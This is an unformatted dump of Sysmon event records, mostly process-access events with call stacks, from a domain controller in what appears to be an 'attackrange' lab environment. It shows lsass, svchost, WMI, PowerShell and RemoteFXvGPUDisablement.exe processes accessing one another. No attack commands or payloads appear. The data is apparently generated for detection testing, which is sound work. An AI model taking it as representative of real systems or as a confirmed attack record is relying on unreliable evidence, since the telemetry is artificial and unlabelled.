13:09:31.885{08A6967A-4286-6000-0B00-000000009A01}8521096C:\Windows\system32\lsass.exe{08A6967A-428B-6000-2200-000000009A01}2828C:\Windows\system32\wbem\wmiprvse.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001076Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:31.885{08A6967A-4286-6000-0B00-000000009A01}8521096C:\Windows\system32\lsass.exe{08A6967A-428B-6000-2200-000000009A01}2828C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001075Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:31.822{08A6967A-4288-6000-1000-000000009A01}11362480C:\Windows\system32\svchost.exe{08A6967A-428B-6000-2200-000000009A01}2828C:\Windows\system32\wbem\wmiprvse.exe0x101541C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+20fee|C:\Windows\system32\wbem\wmiprvsd.dll+43f7|C:\Windows\system32\wbem\wmiprvsd.dll+15538|C:\Windows\system32\wbem\wmiprvsd.dll+1498a|C:\Windows\system32\wbem\wmiprvsd.dll+146e6|C:\Windows\system32\wbem\wmiprvsd.dll+140fe|C:\Windows\system32\wbem\wbemcore.dll+b920|C:\Windows\system32\wbem\wbemcore.dll+255ff|C:\Windows\system32\wbem\wbemcore.dll+24a9a|C:\Windows\system32\wbem\wbemcore.dll+2485e|C:\Windows\system32\wbem\wbemcore.dll+2685b|C:\Windows\system32\wbem\wbemcore.dll+22b78|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001074Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:31.822{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-428B-6000-2200-000000009A01}2828C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001073Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:31.806{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-428B-6000-2200-000000009A01}2828C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001072Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:31.806{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-428B-6000-2200-000000009A01}2828C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001071Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:31.791{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001070Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:31.791{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001069Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:31.791{08A6967A-4286-6000-0B00-000000009A01}8521016C:\Windows\system32\lsass.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001068Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:31.791{08A6967A-4286-6000-0B00-000000009A01}8521016C:\Windows\system32\lsass.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001067Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:31.791{08A6967A-4286-6000-0B00-000000009A01}8521016C:\Windows\system32\lsass.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001066Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:31.728{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4289-6000-1B00-000000009A01}2248C:\Windows\System32\RemoteFXvGPUDisablement.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001065Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:31.635{08A6967A-4286-6000-0B00-000000009A01}8521016C:\Windows\system32\lsass.exe{08A6967A-4289-6000-1B00-000000009A01}2248C:\Windows\System32\RemoteFXvGPUDisablement.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001064Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:31.635{08A6967A-4286-6000-0B00-000000009A01}8521016C:\Windows\system32\lsass.exe{08A6967A-4289-6000-1B00-000000009A01}2248C:\Windows\System32\RemoteFXvGPUDisablement.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001063Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:31.541{08A6967A-4286-6000-0B00-000000009A01}8521096C:\Windows\system32\lsass.exe{08A6967A-4289-6000-1800-000000009A01}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001062Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:31.541{08A6967A-4286-6000-0B00-000000009A01}8521016C:\Windows\system32\lsass.exe{08A6967A-4289-6000-1A00-000000009A01}2240C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001061Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:31.541{08A6967A-4286-6000-0B00-000000009A01}8521096C:\Windows\system32\lsass.exe{08A6967A-4289-6000-1800-000000009A01}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001060Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:31.541{08A6967A-4286-6000-0B00-000000009A01}8521016C:\Windows\system32\lsass.exe{08A6967A-4289-6000-1A00-000000009A01}2240C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x80000000000000001059Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:09:31.416{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\RegisteredSinceBootDWORD (0x00000001) 10341000x80000000000000001058Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:31.056{08A6967A-4288-6000-1100-000000009A01}11921876C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|c:\windows\system32\es.dll+14045|c:\windows\system32\es.dll+200bc|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000001057Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:31.056{08A6967A-4286-6000-0B00-000000009A01}8521016C:\Windows\system32\lsass.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1fb7a|C:\Windows\SYSTEM32\samsrv.dll+5df1|C:\Windows\SYSTEM32\samsrv.dll+5cf2|C:\Windows\SYSTEM32\samsrv.dll+178ce|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001056Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:31.056{08A6967A-4286-6000-0B00-000000009A01}8521016C:\Windows\system32\lsass.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1fb7a|C:\Windows\SYSTEM32\samsrv.dll+5df1|C:\Windows\SYSTEM32\samsrv.dll+5cf2|C:\Windows\SYSTEM32\samsrv.dll+178ce|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001055Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:30.994{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001054Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:30.994{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001053Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 